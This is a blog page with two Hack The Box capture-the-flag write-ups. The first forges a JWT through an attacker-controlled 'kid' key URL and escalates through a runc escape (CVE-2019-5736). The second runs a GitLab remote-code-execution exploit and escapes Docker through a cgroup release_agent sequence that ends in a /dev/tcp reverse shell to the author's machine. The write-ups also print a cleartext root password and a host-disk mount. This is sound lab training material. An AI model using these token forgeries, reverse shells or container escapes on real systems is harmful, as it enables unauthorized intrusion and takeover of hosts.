Tag Archives: docker escape

Hack The Box: The Notebook

Prelude

The Notebook is an intermediate box from Hack The Box, developed by mostwanted002. This was actually one of the fun machines in HTB and I learned some new things and relearned some old things from this machine.

The initial foothold was kind of unique and interesting. It wasn’t easy, but wasn’t that hard either. The first lateral privilege escalation was pretty standard stuff. The final privilege escalation was actually different and I could see a vulnerability I knew in action.

Let’s start the exploitation.

Exploitation

As usual I started the exploitation with Nmap scan.

nmap -sCV -v -oN tcp 10.10.10.230

And I got the scan result as follows.

# Nmap 7.91 scan initiated Sun May 30 11:47:07 2021 as: /usr/bin/nmap -sCV -v -oN tcp 10.10.10.230
Nmap scan report for 10.10.10.230
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: B2F904D3046B07D05F90FB6131602ED2
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There was only two ports running.

From the SSH banner, I presumed the Operating System to be Ubuntu Bionic Beaver 18.04.

Then I started the enumeration of Port 80 by navigating to http://10.10.10.230/ via the web browser and I saw the following page.

There was a Register page and a Login page

I tried some default credentials but they didn’t work. So, I moved on to Register a new account and I got in.

There was a /notes directory, where we can write and save notes. I tried some basic XSS payloads to see if there is any chance for injections. But, nothing worked.

So, I fired up BurpSuite and started looking at the requests and I found out that this web app uses a JWT for authentication.

JWT or JSON Web Token is a string that contains a Header, Payload and optionally the signature of the token. The payload in JWT can optionally be encrypted. JWT are typically used in a web-browser single-sign-on (SSO) context and is a great way to authenticate & authorize without sessions.

In short, JWT works more or less the same as a Session ID, but have more powerful features than a regular Session ID.

A JWT token consists of three base64 encoded strings separated by dots.

We can decode the JWT token using an online service or by using a simple Python script or by selecting the dot separated string hand and base64 decoding.

I used jwt.io to decode the JWT token, since it’s easier and prettier.

From the above output, we can see the Header and Payload part in plain text. If the JWT is encrypted, then we would nee the key/secret to decrypt the token.

From seeing the HEADER section, we can see that three fields.

{
"typ":"JWT",
"alg":"RS256",
"kid":"http://localhost:7070/privKey.key"
}

Here, typ specifies the JSON Web Token, the alg specified what algorithm is used to sign the JWT (Here, it is RSA256) and kid is an optional header claim, which holds a key identifier (secret keyfile used to sign the JWT).

Right away, we can see the issue. The kid parameter is used to verify the JWT and it is a URL for a keyfile named privKey.key.

Since the JWT is unencrypted, we can edit the kid parameter.

Let’s take a look at the Payload part too, before checking the kid issue.

The payload shows a parameter named admin_cap as 0. By taking an educational guess, I thought that this parameter controls if the user has admin access or not.

Exploiting the JWT token vulnerability

Let’s see if the server hits our machine, if we modify the kid parameter with our machine’s IP.

To do that, I changed the kid parameter header part of the JWT using the following command and base64 encoded it.

echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.37/privKey.key"}'|base64 -w 0

I also extracted the payload part of the original JWT token using the following one liner.

 echo -n 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6InNlY25pZ21hIiwiZW1haWwiOiJzZWNuaWdtYUB0ZXN0LmNvbSIsImFkbWluX2NhcCI6IjAifQ.dUvKHGgWZVlib0SrhjtDi1o-2Z-x72xNwx76fTZT547G1N2y1-AyTaw5F04IYPEvqvYlRnYt1Ih3d4eb3-ka9wp0M5oj0nIj44Fml6ouRxdxKRKQ-8eNOqFYRFxaNGG9oypHpvTVf8oC3u2X8lpUkd5MfVJhGXe-vcH7s8K6pij2cP6Ba-CB-oiJIHF8KQUKhJ6VZfZqg9j8XWWKrIZARNh1KpGlNjXeNBopyXT8Q-YWg-rjWVa-G7WKQu-n_jr9hsQ4VYT1PJidYjeVN3nqui7x_7BzGHdhiv7_p2dIxxJQxEED1f44_-vuuMwhG1y9Os4YROCn5EkFM2pCoEYRnKvK3JMawzpno0NTIVpOXArC5eAYIUG5jjQUb93iXIpxHAhS4AtaQ6JNH0ezt1JoLSi0lORUbgjxnrItpGcbF0uzXbchqZZsHMExNYm4684EMTsK_pQvk9dN-6uLXjhblRBBWwdU434pCCiylIgT-cgDroW0T8aRFyuggGo8fKhoxGGSMOI4s6wXtIksPmidR0rxQlxQyzmFKPoyXl1hHTKtjjWuSe5S2oJbTSsHbo8f7aYvHoSy1Ua3kEIopkf8D_lGzFgdEhmUXGwhnAwWJclbSuEYCUURdAUthH8i0Ncfxyn3jbx5zyQDL24NQMcY0OaECrJ3QPRuhTdfG7ItLdU'|cut -d . -f2

Then the combined the two parts with a dot to separate them and the final payload looks like the following.

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4zNy9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6InNlY25pZ21hIiwiZW1haWwiOiJzZWNuaWdtYUB0ZXN0LmNvbSIsImFkbWluX2NhcCI6IjEifQ.dUvKHGgWZVlib0SrhjtDi1o-2Z-x72xNwx76fTZT547G1N2y1-AyTaw5F04IYPEvqvYlRnYt1Ih3d4eb3-ka9wp0M5oj0nIj44Fml6ouRxdxKRKQ-8eNOqFYRFxaNGG9oypHpvTVf8oC3u2X8lpUkd5MfVJhGXe-vcH7s8K6pij2cP6Ba-CB-oiJIHF8KQUKhJ6VZfZqg9j8XWWKrIZARNh1KpGlNjXeNBopyXT8Q-YWg-rjWVa-G7WKQu-n_jr9hsQ4VYT1PJidYjeVN3nqui7x_7BzGHdhiv7_p2dIxxJQxEED1f44_-vuuMwhG1y9Os4YROCn5EkFM2pCoEYRnKvK3JMawzpno0NTIVpOXArC5eAYIUG5jjQUb93iXIpxHAhS4AtaQ6JNH0ezt1JoLSi0lORUbgjxnrItpGcbF0uzXbchqZZsHMExNYm4684EMTsK_pQvk9dN-6uLXjhblRBBWwdU434pCCiylIgT-cgDroW0T8aRFyuggGo8fKhoxGGSMOI4s6wXtIksPmidR0rxQlxQyzmFKPoyXl1hHTKtjjWuSe5S2oJbTSsHbo8f7aYvHoSy1Ua3kEIopkf8D_lGzFgdEhmUXGwhnAwWJclbSuEYCUURdAUthH8i0Ncfxyn3jbx5zyQDL24NQMcY0OaECrJ3QPRuhTdfG7ItLdU

I have skipped the signature part, since that is optional and as of right now, this is just a PoC to verify that the target looks for the privKey.key file from our machine.

I started a python server, pasted the JWT in my web browser’s auth cookie field and refreshed the page.

And I got a hit on my python http server!

Now, the picture is clear.

The parameter that controls the authenticity of the JWT and the parameter that controls the administrator privilege is user controllable. So, we have to generate an RSA key named privKey.key, create a custom JWT token signed by our privKey.key file, with admin_cap set to 0.

Crafting custom JWT token

Let’s generate a private key using ssh-keygen and openssl. Source.

ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key

To generate public key, we can use the following command. But, that isn’t required in our case.

# Given the name of private key is `privkey.key`
openssl rsa -in privKey.key -pubout -outform PEM -out privKey.key.pub

Now, that we have the privKey.key file ready, we can use this file to generate our required token.

I made a small python script to do this.

#!/usr/bin/python3

import jwt
from cryptography.hazmat.primitives import serialization

with open("privKey.key", "rb") as key_file:
    private_key = serialization.load_pem_private_key(
    key_file.read(),
    password=None,
    backend=default_backend()
    )
encoded = jwt.encode({"username":"secnigma","email":"secnigma@test.com","admin_cap":"1"}, private_key, algorithm="RS256", headers={"kid":"http://10.10.14.37/privKey.key"},)

print(encoded)

And it generated the JWT token gracefully!

I copied the token and pasted it in the web browser’s auth cookie field.

Then, I started a python web server and refreshed the web browser.

Got a hit!

And I was in!

Hacker GIFs | Tenor

Once I was logged in, I looked around and the admin page had some clues in the /notes page.

Clue #1
Clue #2

Clue #2 is to look after gaining the initial shell. So, let’s focus on Clue #1 at the moment.

The /admin directory had an Upload File button.

So, I uploaded a PHP reverse shell to it and it was uploaded successfully and showed me a View button.

So, I started a nc listener and clicked View.

And I got a shell back as www-data.

Logging in as Noah

Clue #2 suggested something about backups. So, if we look at /var/backups, then we can see a home.tar.gz file.

If we extract that, we will get the backup of user noah‘s home directory. Inside that, we can find the SSH keys.

So, I used the following command to login as Noah using the private key.

ssh -i id_rsa noah@10.10.10.230

And I was in as Noah!

Privilege Escalation

Running sudo -l as noah shows that he can run a docker container named webapp-dev01.

So, I ran the following command to log into the docker container.

sudo /usr/bin/docker exec -it webapp-dev01 bash

We are root inside the container and I could some some python web app files.

This was the source code of The Notebook program and the file named create_db.py contained SHA265 hashes for users admin and noah.

I tried to crack it with Hashcat, but it didn’t cracked.

So, I moved on to enumerate inside the docker container.

I ran docker enum script deepce, but didn’t find anything interesting, except that the docker container had some capabilities.

I tried out some exploits according to the capabilities, but they didn’t worked.

So, I exited the container and checked the docker version using the following command.

docker -v
The docker version is 18.06.0-ce

I looked vulnerabilities for the docker version and found that this version of docker was affected by a runc container escape vulnerability (CVE-2019-5736).

runC as explained by docker.com is a lightweight, portable container runtime. It includes all of the plumbing code used by Docker to interact with system features related to containers.

I knew about this vulnerability, but didn’t got a chance to exploit it. Well now’s my time.

This exploit code is written in go and we have to compile it and transfer the static binary to the container.

The exploit works by overwriting and executing the host systems runc binary from within the container.

It achieves this by overwriting /bin/sh in the container with #!/proc/self/exe which will point to the binary that started this process (the Docker exec/runcinit). After that, the script can then proceed to write to the target of /proc/self/exe to try and overwrite the runc binary on the host. More info from here.

This exploit will wait for some one to execute docker exec /bin/sh and when that happens, this will trigger the exploit which will allow code execution as root in the host machine.

The side effect of this exploit is that we are overwriting our implementation of runc which will ensure our system will no longer be able to run Docker containers. So, in real life cases, backup the runc file (either /usr/bin/docker-runc or /usr/bin/runc) before using this exploit.

I cloned the repo andedited the payload to netcat traditional payload.

Then I compiled the exploit by using the following command.

go build main.go

Then I moved the binary to the docker container and ran the binary.

Then on a different SSH session, I issued the following command since, we have overwritten the /bin/sh binary.

sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

The exploit binary detected this.

And I got a root shell back!

Yup. W00t!

Postlude

And that was The Notebook!

This was a great box and I’ve learned several things from this box.

Kudos to mostwanted002 for creating this box!

Peace out! ✌️

Hack The Box: Ready

Prelude

As evident from the title, I am in the process of migrating from abatchy’s OSCP like vulnhub machines list to other platforms. So, I decided to go with Hack The Box and Try Hack Me. HTB is actually a huge leap in comparison with vulnhub boxes and Try Hack Me, but nevertheless it is a great platform.

My goal is to start with HTB easy boxes and THM’s easy rooms. Then once a comfortable number of easy boxes/machines are rooted in both platforms, move on to their intermediate machines/rooms.

This machine Ready was marked as an Easy machine, however the “easiness” is relative. Quoting vulnhub here, What you find “hard”, other people may find “easy” and vice versa.

Overall, this machine was a roller coaster ride. Getting initial foothold was straight forward. But as a beginner to gitlab configurations and docker escapes, this felt like an easy-intermediate machine and since free users can’t reset the machines (as easily as VIP), the container escape was a painfully long process of waiting for reset and trying out the exploit.

Overall this machine was an incredible learning experience in pentesting and maintaining patience.

The Love Notepad (Inazuma Eleven All Series Oneshot) - • Fujiwara Chika ( GIF ) • | Anime faces expressions, Anime, Anime expressions

Let’s start the exploitation.

Exploitation

As usual I started the exploitation with Nmap scan.

nmap -sCV -v -oN tcp 10.10.10.220

And the result I got is as follows.

Nmap scan report for 10.10.10.220
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 AA:22:CC:44:DD:66:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 AA:22:CC:44:DD:66:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 AA:22:CC:44:DD:66:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
|_http-favicon: Unknown favicon MD5: F7E3D97F404E71D302B3239EEF48D5F2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  3 13:46:18 2021 -- 1 IP address (1 host up) scanned in 20.87 seconds

We have two ports open.

Googling the OpenSSH version showed that the target version as Ubuntu Focal.

After finding out the target OS, I proceeded to enumerate port 5080.

Navigating to http://10.10.10.220:5080 showed the a Gitlab front page.

Since, I don’t have any credentials, I signed up for an account.

After I logged in, I navigated to http://10.10.10.220:5080/help to find the version.

PRO TIP #1: We can also navigate to http://10.10.10.220:5080 /api/v4/version to find the version (After Authentication).

Searchsploit-ing the version has showed an Authenticated RCE exploit!

I ran the 49334.py exploit by using the following command with the credentials I used to signup to GitLab.

python 49334.py -u secnigma -p test1234 -g http://10.10.10.220 -l 10.10.14.89 -P 9001

And I got a shell back!

EZPZ Right!?

PRO TIP #2: We should always start the netcat listener inside a bash shell, since ZSH won’t upgrade our shell to a full TTY using the stty raw -echo method.

I was logged into the machine as git user.

There was not too much to go around except for the user flag at /home/dude directory.

So, I started the LinPEAS enumeration. But, there wasn’t anything too interesting in LinPEAS output; or so I thought.

However, there were some curious things in the LinPEAS report, which I missed in my initial speed read.

For starters, LinPeas reported that we were inside a docker container.

So, probably the privesc vector might be escaping the docker container.

So, I started to look around Docker escape techniques and came up with two exploits; which will be explained below.

Docker Container escape techniques

Like I said above, I have found two potential container escape techniques. One was a CVE and the other was an exploitation technique based on container misconfiguration.

The first exploit I found was CVE-2019-5736. This exploit escapes docker container by overwriting and executing the host system’s runc binary from within the container. runc is a CLI tool for spawning and running containers according to the OCI specification.

The second container escaping technique I found was this (Second PoC). You can learn more about this technique from this blog post. This technique exploits a misconfigured docker container that meets the following criteria:

  1. We must be running as root inside the container
  2. The container must be run with the SYS_ADMIN Linux capability
  3. The container must lack an AppArmor profile, or otherwise allow the mount syscall
  4. The cgroup v1 virtual filesystem must be mounted read-write inside the container

I have found the fdisk binary at /sbin using find /-type f -name fdisk 2>/dev/null.

I can use the mount command to view mount points. The output of the command showed me that cgroup virtual filesystem has mounted as read-write inside the container .

I still don’t know if the fs is cgroup v1 or not, but let’s hope it is.

So, In theory, if I got a root shell on the container and if the container is was running with all the criteria mentioned above, then I could escape the container.

But, since these exploitation techniques I found requires me to have root access on the container, I couldn’t test them out.

Can you imagine my frustration!?

Frustrated Woman GIFs - Get the best GIF on GIPHY

So, I took a break to cool of my mind.

When I returned, I started re-reading the LinPEAS output like crazy, but nothing stood out.

Then I went to htb forums to get some nudges. There was n number of comments telling different things. However, one comment in particular stood out. Someone said something about reading configuration files.

Getting root inside Docker

So, I went back and looked for configuration files found in LinPEAS and began to grep them for the string password one by one.

I then noticed that GitLab has a PostgresSQL database as a running process. So, I googled the location of PostgreSQL configuration file to find potential passwords.

My idea was to login to PostgreSQL using the credentials in the configuration file and check for password re-use. The location of the GitLab configuration was found to be at /etc/gitlab/gitlab.rb.

However, /etc/gitlab/gitlab.rb was not accessible due to permissions.

So, I searched for gitlab.rb files system wide.

find / -type f -name gitlab.rb 2>/dev/null

And found out several gitlab.rb files!

That was a dumb thing to do and I still don’t know why I did that. However, that was fruitful!

So, I grep-ed every gitlab.rc file for the string password.

grep -i password /opt/backup/gitlab.rb|grep -v ^#

And found an SNMP password at /opt/backup/gitlab.rc.

Then I tried the password for password reuse.

su root
Password:wW59U!ZKMbG9+*#h

And I was in!

Was it as easy as it looks?

The Pursuitof Happyness Clap GIF - ThePursuitofHappyness Clap Satisfied - Discover & Share GIFs
No sir it wasn’t.

As I thought, there wasn’t a root flag inside docker container.

Moving on…

Escaping Docker Container

I have got root. Now it’s time to bring my arsenal.

I have tried the first exploit. It involved building an executable in go and dropping the binary in the container. But, that didn’t work.

So, I tried the second escape technique; which was easy, since it only required to execute a set of commands, thanks to hacktricks.xyz.

I issued the following commands inside the container as root.

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/10.10.14.89/9001 0>&1" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

And I got a shell back!

Woot Woot!

Now, full disclaimer I didn’t get the root flag the first time the way I explained above. I got root by an unintended way (explained below) as the above exploit wasn’t working at that time.

So, I waited a painfully long period for the machine to be reset, tried the above exploit again and got root shell the second time. The unintended way was quite promising; however, no matter what I tried, I couldn’t get a Shell via the unintended way. Oh well!

Unintended way of getting root flag

The unintended way is explained in the same hacktricks.xyz article as I’ve mentioned above (First PoC). This didn’t work completely for some reason, but I could mount the host fs inside the docker container!

To perform this, the container should meet the following criteria.

  1. We must be running as root inside the container
  2. Running docker with –privileged flag
fdisk -l
mkdir /tmp/test
mount /dev/sda2 /tmp/test

Now, I could navigate through the file system and find the root flag that way!

Now, I tried to drop SSH keys inside the host’s file system and tried to login to the host via SSH.

ssh root@10.10.10.220

But, that failed miserably no matter what I tried. Oh Well!

Edit: This issue might’ve happened probably because the machine were in a messed up state, as others who wrote writeup for Ready have escalated privileged through this method fairly easily.
One reset could’ve made this worked for me, but I was all out of resets at that time!  😅 
Links to the walkthrough is given below:
Video of IppSec

Overall, this was a great box and I have learned some cool misconfigurations and vulnerabilities to look out for. Also, this machine reassured that how important it is to have basic linux skills in the domain of Infosec, as without find and grep, I would’ve never solved this machine! 😅

So, thanks to bertolis for creating this machine, Dick Haight for developing find and Ken Thompson for finding the venerable grep! 😄